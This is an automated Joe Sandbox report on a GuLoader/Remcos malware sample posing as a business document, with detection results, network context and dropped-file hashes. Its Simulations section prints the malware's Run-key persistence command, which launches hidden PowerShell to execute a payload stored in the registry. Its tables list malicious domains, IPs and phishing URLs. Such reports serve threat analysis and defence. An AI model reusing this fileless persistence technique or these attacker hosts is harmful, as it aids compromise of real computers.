Start date and time: 2024-05-03 09:42:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 46
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 586 R1 M-LINE - GEORGIA 03.05.2024.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@71/43@3/3
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 91
• Number of non-executed functions: 39
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.73.29, 104.208.16.94, 20.42.65.92, 52.168.117.173
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Execution Graph export aborted for target powershell.exe, PID 1612 because it is empty
• Execution Graph export aborted for target wab.exe, PID 6544 because there are no executed functions
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Simulations (Time | Type | Description):
08:43:52 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Unthematic %Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)
08:44:01 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Unthematic %Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)
09:42:59 | API Interceptor | 29x Sleep call for process: powershell.exe modified
09:44:13 | API Interceptor | 7x Sleep call for process: WerFault.exe modified
09:44:31 | API Interceptor | 79x Sleep call for process: wab.exe modified
Joe Sandbox View / Context, IPs (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
178.237.33.50 | xi0TpAxHGMsm.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | PO-USC-22USC-KonchoCo.exe | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | REVISED NEW ORDER 7936-2024.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | INQUIRY#46789.xla.xlsx | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Teklif talebi BAKVENTA-BAKUUsurpationens.cmd | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | GVV.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Evgh. rvs Armenia. 30.04.2024.exe | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | 202404294766578200.xlam.xlsx | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta | malicious | GuLoader, Remcos | geoplugin.net/json.gp
172.67.215.46 | NewCPhong.exe | malicious | Unknown |
193.222.96.21 | PO-USC-22USC-KonchoCo.exe | malicious | GuLoader, Remcos |
193.222.96.21 | Evgh. rvs Armenia. 30.04.2024.exe | malicious | GuLoader, Remcos |
193.222.96.21 | .04.2024.exe | malicious | GuLoader, Remcos |
193.222.96.21 | z39103_PN-EN-1090-1_A1_2012P.exe | malicious | GuLoader, Remcos |
193.222.96.21 | z6FORMATOPROVEEDORESMETAX.exe | malicious | GuLoader, Remcos |
193.222.96.21 | z77EU17439-FT-MILKYLUXGOUDAMILD.exe | malicious | GuLoader, Remcos |
193.222.96.21 | sample.exe | malicious | GuLoader, Remcos |
193.222.96.21 | Copy of Noyan Order Form Global Importing Group 2024.exe | malicious | GuLoader, Remcos |
193.222.96.21 | Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe | malicious | GuLoader, Remcos |
193.222.96.21 | 107. PN-EN-1090-2+A1_2012P.exe | malicious | GuLoader, Remcos |

Joe Sandbox View / Context, Domains (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
learfo55ozj02.duckdns.org | PO-USC-22USC-KonchoCo.exe | malicious | GuLoader, Remcos | 193.222.96.21
learfo55ozj02.duckdns.org | Evgh. rvs Armenia. 30.04.2024.exe | malicious | GuLoader, Remcos | 193.222.96.21
enelltd.top | PO-USC-22USC-KonchoCo.exe | malicious | GuLoader, Remcos | 104.21.45.139
geoplugin.net | xi0TpAxHGMsm.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | PO-USC-22USC-KonchoCo.exe | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | REVISED NEW ORDER 7936-2024.vbs | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | INQUIRY#46789.xla.xlsx | malicious | Remcos | 178.237.33.50
geoplugin.net | Teklif talebi BAKVENTA-BAKUUsurpationens.cmd | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | GVV.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Evgh. rvs Armenia. 30.04.2024.exe | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | 202404294766578200.xlam.xlsx | malicious | Remcos | 178.237.33.50
geoplugin.net | PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta | malicious | GuLoader, Remcos | 178.237.33.50

Joe Sandbox View / Context, ASNs (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
SWISSCOMSwisscomSwitzerlandLtdCH | 2AAH1UYstb.elf | malicious | Mirai | 164.207.10.72
SWISSCOMSwisscomSwitzerlandLtdCH | PO-USC-22USC-KonchoCo.exe | malicious | GuLoader, Remcos | 193.222.96.21
SWISSCOMSwisscomSwitzerlandLtdCH | Evgh. rvs Armenia. 30.04.2024.exe | malicious | GuLoader, Remcos | 193.222.96.21
SWISSCOMSwisscomSwitzerlandLtdCH | cvoBQP1Lxo.elf | malicious | Mirai | 170.17.254.60
SWISSCOMSwisscomSwitzerlandLtdCH | cqf3hb5Qxg.elf | malicious | Mirai | 146.4.138.28
SWISSCOMSwisscomSwitzerlandLtdCH | 957URl9ErB.exe | malicious | Socks5Systemz | 193.222.96.219
SWISSCOMSwisscomSwitzerlandLtdCH | .04.2024.exe | malicious | GuLoader, Remcos | 193.222.96.21
SWISSCOMSwisscomSwitzerlandLtdCH | z39103_PN-EN-1090-1_A1_2012P.exe | malicious | GuLoader, Remcos | 193.222.96.21
SWISSCOMSwisscomSwitzerlandLtdCH | z6FORMATOPROVEEDORESMETAX.exe | malicious | GuLoader, Remcos | 193.222.96.21
SWISSCOMSwisscomSwitzerlandLtdCH | z77EU17439-FT-MILKYLUXGOUDAMILD.exe | malicious | GuLoader, Remcos | 193.222.96.21
CLOUDFLARENETUS | x2B1c7K1L2D9M15048176901.html | malicious | Unknown | 104.21.59.220
CLOUDFLARENETUS | https://possible.network/?cmFuZDE9WTI1aFN6SlNOazlXT1V4WGJFZGpaVEpJYnpjPSZzdj1vMzY1XzFfbm9tJnJhbmQyPVFYRnlhR2RJU2xOeVUyb3lZMnREYmtwRVRuUT0mdWlkPVVTRVIyNTA0MjAyNFVOSVFVRTAxMzgwNDI1MzkyMDI0MjAyNDA0MjUzODAxMzkmcmFuZDM9YWtkSlYwOTFSWEYwV0hSU1NISlJVbGRIUzBFPQ== | malicious | HTMLPhisher | 172.67.128.246
CLOUDFLARENETUS | PO-240501-PDF.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
CLOUDFLARENETUS | rE56cXOc25.rtf | malicious | AgentTesla |
                                                    • 172.67.215.45
                                                    qneGb3RjUn.rtfGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.215.45
                                                    SecuriteInfo.com.Win32.PWSX-gen.2445.18181.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.13.205
                                                    https://0ia63.q39r.com/0IA63/Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.21.17.5
                                                    SecuriteInfo.com.Win32.PWSX-gen.11739.16980.exeGet hashmaliciousRisePro StealerBrowse
                                                    • 104.26.5.15
                                                    https://mandrillapp.com/track/click/31140489/aazenterprise.com?p=eyJzIjoiNUJvNUhtZmVHb2F5TEhHSWo4U3JuemNCVDJBIiwidiI6MSwicCI6IntcInVcIjozMTE0MDQ4OSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FhemVudGVycHJpc2UuY29tXFxcL2lucXVpcnkuaHRtbD93aGl0ZT1aR1YyY21sbGJtUjBMbUpsY25SQVpHVnRaUzFuY205MWNDNWpiMjA9XCIsXCJpZFwiOlwiNTQ2NzE3YTVmZjkwNDc2Zjk4NzEyMzQ3MjYwNGUyYThcIixcInVybF9pZHNcIjpbXCI1N2JjZTAyMmU5NDQ5ODNjNzcxODk1ZTUzYThjYmMzZDdhNmZhZmEyXCJdfSJ9Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.2.184
                                                    https://www.canva.com/design/DAGEBBzq9KM/jvjE01qRbaOyWhWyDOHDeg/view?utm_content=DAGEBBzq9KM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                    • 104.16.103.112
                                                    ATOM86-ASATOM86NLxi0TpAxHGMsm.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    GVV.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    37f463bf4616ecd445d4a1937da06e19a.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 172.67.215.46
                                                    a.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 172.67.215.46
                                                    Wb9LZ5Sn1l.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                    • 172.67.215.46
                                                    SecuriteInfo.com.Variant.Doina.72042.21290.22220.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.215.46
                                                    c4RAHq3BNl.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                    • 172.67.215.46
                                                    file.exeGet hashmaliciousVidarBrowse
                                                    • 172.67.215.46
                                                    JpFr8C6ljd.dllGet hashmaliciousUnknownBrowse
                                                    • 172.67.215.46
                                                    JpFr8C6ljd.dllGet hashmaliciousUnknownBrowse
                                                    • 172.67.215.46
                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                    • 172.67.215.46
                                                    PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 172.67.215.46
                                                    No context
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5801888550161941
                                                    Encrypted:false
                                                    SSDEEP:96:GxFWKIAKAsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAOf/VXT5Nm:GYKIAKAk0WbkQzuiFkZ24IO8b
                                                    MD5:C4FBCF57FBB946E5EBEC5911AD3EB2A8
                                                    SHA1:833184E63204064CC55710BC0DD7386B2630A9E2
                                                    SHA-256:648584971D9FA1D527C3FFF0F6A63174F4BF2291B287D6C1C6C047FB63229419
                                                    SHA-512:3F6C68E0BF33D8A0D1FD5FAD609B259B34B34F9A024C1B571549ECF6BF2D7264A44B217A86125D2EE07F0C8E0689F9989E92F51CBD47B1806A007004B2FC4AFA
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.580554351180953
                                                    Encrypted:false
                                                    SSDEEP:96:rGFnZUAKZsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAOf/VXT5Nm:qbUAKZk0WbkQzuiFkZ24IO8b
                                                    MD5:49353F8A9094CE02D05CA1BA898F6EBB
                                                    SHA1:6208E1549A75E22CD646CBD30C947209645EC729
                                                    SHA-256:1C5E7F30D288BE6DB99D92FD183E0F639306A8918D5A161D9A20EB0D67BCD41C
                                                    SHA-512:8E0F03781FD4626D3217F1FB1623CA6D96936BE78D3699855745B3A77ADF8E292CCBA914D84EEEE4B4815A0ACD2CFAD4C690A8E804B863288928FC147D5CDAC3
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5804373497227237
                                                    Encrypted:false
                                                    SSDEEP:96:9ZFsDAK/sQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAHf/VXT5NHG:7qDAK/k0WbkQzuiF/Z24IO8b
                                                    MD5:973998ADEFAEBD296FCE6ADACC91C239
                                                    SHA1:C5CA544715243EDB062C049DF8B3DD66073AA38C
                                                    SHA-256:00AA39A401BC3DBC8E44AA78840A07F07B552B33A4EA68D95A714A252E981FF1
                                                    SHA-512:CB53DCBCB46D73FFA7C79B06B5093AAC435E494EECB58698A247FB052EC19C3CFEE502369917F25B2E3077253BA27442ADA17AA1FDFB515E62F29876B9DB75D3
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5805092768680671
                                                    Encrypted:false
                                                    SSDEEP:96:nXFUAKSsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAHf/VXT5NHBg:XeAKSk0WbkQzuiF/Z24IO8b
                                                    MD5:F3184E47524E453E44F5F66FA5FE2DB4
                                                    SHA1:98AEF61BA6C95E3A503C3A459318603CEDA5CFF2
                                                    SHA-256:A90B6318177F0E63F14584D5FE753724CE920AB1F6F48C15E777902C75D478AE
                                                    SHA-512:89480AAC2AC2D134ABA574C97E43452C0A19F0F80E233EFA6CC29C58152D9350822B003B4DBD58C30AD1BAECB5F5B1DD6AE819A70A57AC25D20278C33B22B34A
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5799927588934032
                                                    Encrypted:false
                                                    SSDEEP:96:FYFO6AKwsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAHf/VXT5NHG:O/AKwk0WbkQzuiF/Z24IO8b
                                                    MD5:00167BA4D42757751FF68DDF7E8752C9
                                                    SHA1:0C6C56993EDDF3C3F687E450A95B55A5F3061EB7
                                                    SHA-256:B37B0B8BCF66A7B7E66B26D6E3C9CDDBCB830FDA230BA0408AAB71A4DF9680A1
                                                    SHA-512:B466FD242E2FD84A8DBAC68862B92742D645DA237311015793A216F35C9786D40EF0C72666F397DE828B9A82FD211B9E1F5817700A0F373C619ADD9902DD6B68
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5805792081838115
                                                    Encrypted:false
                                                    SSDEEP:96:yEFw6jAKyasQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAHf/VXT5c:jHjAKBk0WbkQzuiF/Z24IO8b
                                                    MD5:C9CE2F397334EF1C573C9BB4ADF609F1
                                                    SHA1:908CC39F5DBF91BA6C6D2EDB0CDA0ACCF574F7FC
                                                    SHA-256:38437752E09F736B7857ADA139319C6F7E16ECB03E15DDA4FC08E5801CBC11F2
                                                    SHA-512:F786A01F700516B6AEC856A2934800A3293CC0AE3E2F287AD0D2DADB3B4E18026B5EE00B476347BAB26B0E3050488A042F13E17E7F63D2BBD008335D210F66AE
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5805852011017253
                                                    Encrypted:false
                                                    SSDEEP:96:iauFCAKI7tsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAOf/VXT5c:coAKI7tk0WbkQzuiFkZ24IO8b
                                                    MD5:DC9EE084BB262EE8CC9768F17762726D
                                                    SHA1:00F32D96E8737DC3BE549A96623B0BEC4CEA8B57
                                                    SHA-256:2EAD8AD20194A65E0D51F5FC3822C7D800D3206D919E0252D441D4BAED751648
                                                    SHA-512:71D2056CFE4294E583E1FFB327AA1D38EA7D5887E26F7F37320E5C486D9A08D56980367658DF9DCDF89D61EA593977092FB2E684C7BE7EA617231133C20EE455
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8252
                                                    Entropy (8bit):3.6762875704759965
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJPU6v6YWo6SgmfUlpxm89bObsfR6m:R6lXJs6v6YB6SgmfUlOgfN
                                                    MD5:2A5BB587C32A74F7BDA8B4F7CAB07F9C
                                                    SHA1:A92221922D0FA0D0EB066CE73D6673B54631597E
                                                    SHA-256:BD564E700846470CFE4A104BB38D018213B11BCBC580F8BB18344B59004DE049
                                                    SHA-512:0F6F7D601E59B303A5871BF39C9E3C62CD1B1B7910023A6BE31912CBC0E1F44F60B587173CB3124290512FA3DF3CF7417A5D538502175114D100BFCC7BD720AA
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.4264332111784
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsCuJg77aI9+ZWpW8VY8YYm8M4JTHFF3x+q87K7I3dBxd:uIjfCkI7Eo7VVVJn3xnk3dBxd
                                                    MD5:A28C6A1F5123330ECC3D8BD3FD3C5FAB
                                                    SHA1:B282E8609A452E5295E6CA24F83AE667AB440FE7
                                                    SHA-256:FA71B58DA0B9E1C85573EC93D1A0F3EF1EFA619AB53ABACE2EC58CC7DCFAEEF2
                                                    SHA-512:38D67EFCFEDA57E11482804716796AA76BE9115A2046C67D7826DA323ADD54B0142C33B401EA68F6CC7AF42763E4241E824F04814B1AF133E3549CA1B028073B
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8252
                                                    Entropy (8bit):3.6765869898098247
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJ4D6Hw6YWV6SgmfUlpx+89bOusfG6m:R6lXJc6Hw6Yc6SgmfUtOtfy
                                                    MD5:2C4674CD003BB87DD69ACA9B2F8BFB5F
                                                    SHA1:5AFFBCAF8F2F4A60807698B171874E2C47A47EBA
                                                    SHA-256:8DDE948E70CD1CFE6204349B0D89E980E3EF22356FB5F9299CD88E8A628360AB
                                                    SHA-512:09246FF6A8531C0A406D849488C4DEF1F0D4E6AD9240C4A880D1991C272C37F9EFDADCE20B4098EDAB47EA84855A40C23F955DF5AC08B469D30B04C9F71BA907
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8252
                                                    Entropy (8bit):3.6759951217344486
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJ716r6YWW6SgmfUlpxW89bOmsfg6m:R6lXJZ6r6Yf6SgmfUVOFfM
                                                    MD5:091237A6284B429D50C063A656892831
                                                    SHA1:294B57F470CD3DF5FE4EF8F87335C1A90E64C558
                                                    SHA-256:E0B3ED9A18880E407936486AE778E95C0BADD4774AA2C0C1A9E32A32B5FB044A
                                                    SHA-512:A4269DC4EBD365282F35C1922D561EB33825979E5F13947EF4FD0F293D2D7F1B72E075F3B58B5B555BCF3ACBE6938373A1C535BD9BDB70BA2FBAF5646369EA89
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.420903366004985
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsCuJg77aI9+ZWpW8VY80Ym8M4JTHFY+q87B1Zm7I3dBXd:uIjfCkI7Eo7VVBJuQ3mk3dBXd
                                                    MD5:31CE6AF1CC0EAD62E77D0696FF12C888
                                                    SHA1:5BEFB873620B15FA2FF28C3AE65E8D1AC2E57E4E
                                                    SHA-256:0B88519218B5065B602886A734B7DB28E3F331593FAC286E2267096F9BC3885F
                                                    SHA-512:530868093B5669442EE6C6C9D04B1346DFFD5C807F9F3F0DFAEC130E09D09405A2EF31B4AEF7FAB616774572F8637E2609536FA04900CB926B23E9AC67783515
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306646" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.423036435354077
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsCuJg77aI9+ZWpW8VY81Ym8M4JTHFg1+q87z7I3dBgd:uIjfCkI7Eo7VVEJi16k3dBgd
                                                    MD5:8D31AB3807A1757EE366E32CE7510158
                                                    SHA1:E5D9B34056F7BE3E15301D31EDBC2E5E073CDBA0
                                                    SHA-256:3E224B33DDEB8E705E7CD0BC58F53C09A127617CB15930DE86BEC65F352FB25D
                                                    SHA-512:C60638100025A2A69F997EFA912E6ED204AC24234048F4D2D276A2296284185184958016A1A1BFDB7BFD3DA0D9371771CDDD22C432DB3E7C813C9C23BC31412F
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306646" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8250
                                                    Entropy (8bit):3.675575760443084
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJbt6Y6YWc6Dy6TgmfUlpxT89bf8sfFYVm:R6lXJh6Y6Y16Dy6TgmfU+fPfFn
                                                    MD5:FE021C525185CE2A5B60D9781215E456
                                                    SHA1:939BE666356B986FDA891222C3DB7649890356C0
                                                    SHA-256:9430B043A5CF4F4F55069BD97DDEAF0F7E1EE5ED281302BBD53D548E99275D51
                                                    SHA-512:123B6C68C5011CE13BEE290C1A6A9BF7387173187B664C7CD4D023C07AD7864BA78964C0280CE9D555D3A6A96FFEB98DADA8E11DE96EF5508A2B6E9B9B0A3BCB
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.6.4.<./.P.i.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.423885209290305
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsCuJg77aI9+ZWpW8VY80Ym8M4JTHFt+q8787I3dBsd:uIjfCkI7Eo7VVBJPlk3dBsd
                                                    MD5:8815B1CC2E84A55539F3013F615A894F
                                                    SHA1:BC8A6F15EFBE601EA55C7BE605766487CE2054EF
                                                    SHA-256:3BE5735A7F95BAFDE0308B04EAC404F35205C098FEF10E299C2369AD6B679C2B
                                                    SHA-512:B2ABA50EEC037E5DA9D6953EE32FAEFB31EE26AECE1BD9521CCAFAA7B9651376A8367BE403F80B926F1C887BE5653E0283E50D7234D13CAA2DC8F6C2B2B08279
                                                    Malicious:false
